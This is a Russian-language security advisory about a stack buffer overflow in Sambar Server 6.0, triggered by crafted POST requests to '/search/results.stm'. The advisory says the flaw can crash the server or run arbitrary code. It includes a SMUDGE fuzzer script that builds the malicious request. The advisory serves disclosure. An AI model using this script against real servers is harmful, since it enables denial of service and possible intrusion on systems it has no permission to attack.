Дата публикации: | 12.02.2004 |
Всего просмотров: | 1255 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Sambar Server 6.0
Описание: Переполнение стекового буфера обнаружено в Sambar Server в обработке HTTP POST запросов. Удаленный пользователь может аварийно завершить работу Web сервера или выполнить произвольный код. Удаленный пользователь может послать специально сформированные данные через POST запрос '/search/results.stm', чтобы вызвать переполнение буфера и потенциально выполнить произвольный код на уязвимой системе. Пример/Эксплоит: # http://felinemenace.org/~nd/SMUDGE # Sambar script (c) nd@felinemenace.org from SMUDGE import * import sys sm = SMUDGE(1) sm.setname("SambarOverflow") sm.plain("POST /search/results.stm HTTP/1.1") sm.addcrlf() sm.plain("Host: MSUDGEDPU") sm.addcrlf() sm.plain("Content-Length: ") sm.blocksize("postdata") sm.addcrlf() sm.addcrlf() sm.putblock("postdata") sm.addcrlf() sm.addcrlf() sm.newblock("postdata") sm.updateblock("postdata","spage=0&indexname=docs&query=") sm.blockvariable("postdata","MEEP") sm.updateblock("postdata","&style=page") sm.run("127.0.0.1",80,"topdown","single") URL производителя:http://www.sambar.com/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Sambar 6.0 stack overflow |